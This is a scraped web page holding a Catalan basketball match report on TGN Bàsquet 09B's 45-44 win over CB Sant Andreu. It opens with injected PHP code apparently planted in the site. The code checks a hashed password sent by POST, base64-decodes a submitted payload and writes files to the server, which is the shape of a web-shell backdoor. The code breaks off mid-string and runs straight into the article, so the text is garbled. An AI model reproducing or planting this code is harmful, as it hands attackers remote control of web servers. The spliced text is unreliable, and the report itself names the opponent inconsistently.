function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Victòria ajustada al Sagrat Cor! -

Victòria ajustada al Sagrat Cor!

Updated: novembre 22, 2022

Partit molt travat, amb no massa bones sensacions de l’equip lila que va acabar amb la victòria per un punt del conjunt tarragoní contra el CB Sant Andreu al pavelló del Sagrat Cor (45-44).

D’inici el TGN Bàsquet va començar per darrere al matx, i al segon quart va reconduir la situació, posant-se 8 punts amunt. Semblava que trencaria el partit en qualsevol moment, però el partit que no agafava ritme a cause de les constants aturades. Així doncs un partit travat que va acabar decidint-se als instants finals, amb poca anotació dels dos conjunts.

L’equip del CB Sant Cugat, entre el tercer i quart període, amb una gran anotació des del tir lliure, i a causa de la gran actuació de la seva jugadora núm. 59, Almazán, que malgrat que la seva gran altura demostrava que es desenvolupava amb molta coordinació i velocitat a la pista, van aconseguir posar-se per davant a l’últim quart (cinc punts a dalt).

Tot i això, en tres minuts, el TGN a causa de diverses recuperacions de pilota que van ser convertides en cistella, mostrar a l’afició lila les bones transicions ofensives de l’equip, assoliria capgirar el partit amb un parcial de 10-0 a favor seu.

Però el conjunt visitant no baixaria els braços i va continuar lluitant, però la victòria es va quedar al Sagrat Cor.

SOM-HI EQUIP!

TGN BÀSQUET 09B 45 – 44   CB SANT ANDREU

PARCIALS: 09-13, 17-6, 7-11, 12-14

TGN BÀSQUET 09B: TGN BÀSQUET 09B: Montell (10), Sabate (4), Prades (6), Meroño (10), Sala (0) —cinc inicial—Fernández (1), Burjales (3), Diez (5), Gandía (3), i Carayol (3). 1 triples: Carayol (0).
LES XIFRES DEL PARTIT: 6/25. tirs lliures. 25 faltes. Eliminada: –

CB SANT ANDREU: CB SANT ANDREU: Zamora (8), Almazán (13), Ruiz. C (4), Serrano (10), Gómez (4) —cinc inicial— Molinos (2), El Kharraz (2), i Ruiz. D (1). LES XIFRES DEL PARTIT: 0 triples. 10/30 tirs lliures. 20 faltes. Eliminada: Almazán (min 40)